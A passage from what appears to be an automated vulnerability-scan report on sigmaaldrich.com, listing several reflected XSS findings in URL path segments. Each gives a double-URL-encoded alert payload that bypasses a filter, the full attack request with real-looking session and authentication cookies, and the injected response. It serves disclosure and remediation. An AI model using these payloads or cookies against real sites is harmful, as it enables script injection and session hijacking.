Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:41 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibc978a";alert(1)//673593163e9/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf","E404") ;
   </script>
...[SNIP]...

1.274. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70bda%2522%253balert%25281%2529%252f%252fb8deff2092e was submitted in the REST URL parameter 3. This input was echoed as 70bda";alert(1)//b8deff2092e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs70bda%2522%253balert%25281%2529%252f%252fb8deff2092e/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:42 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs70bda";alert(1)//b8deff2092e/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf","E404") ;
   </script>
...[SNIP]...

1.275. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84739%2522%253balert%25281%2529%252f%252fe4b7ff632bb was submitted in the REST URL parameter 4. This input was echoed as 84739";alert(1)//e4b7ff632bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Aldrich84739%2522%253balert%25281%2529%252f%252fe4b7ff632bb/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:45 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Aldrich84739";alert(1)//e4b7ff632bb/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf","E404") ;
   </script>
...[SNIP]...

1.276. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 713b6%2522%253balert%25281%2529%252f%252f78a955d0321 was submitted in the REST URL parameter 5. This input was echoed as 713b6";alert(1)//78a955d0321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Aldrich/Brochure713b6%2522%253balert%25281%2529%252f%252f78a955d0321/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:47 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Aldrich/Brochure713b6";alert(1)//78a955d0321/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf","E404") ;
   </script>
...[SNIP]...

1.277. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db3a5%2522%253balert%25281%2529%252f%252f5df5dbd717c was submitted in the REST URL parameter 6. This input was echoed as db3a5";alert(1)//5df5dbd717c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Aldrich/Brochure/db3a5%2522%253balert%25281%2529%252f%252f5df5dbd717c/al_chemfile_v5_n1.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:49 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Aldrich/Brochure/db3a5";alert(1)//5df5dbd717c/al_chemfile_v5_n1.pdf","E404") ;
   </script>
...[SNIP]...

1.278. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/vol3-issue1-proteomics.Par.0001.File.tmp/vol3-issue1-proteomics.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7876%2522%253balert%25281%2529%252f%252f68b0607b97f was submitted in the REST URL parameter 1. This input was echoed as e7876";alert(1)//68b0607b97f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

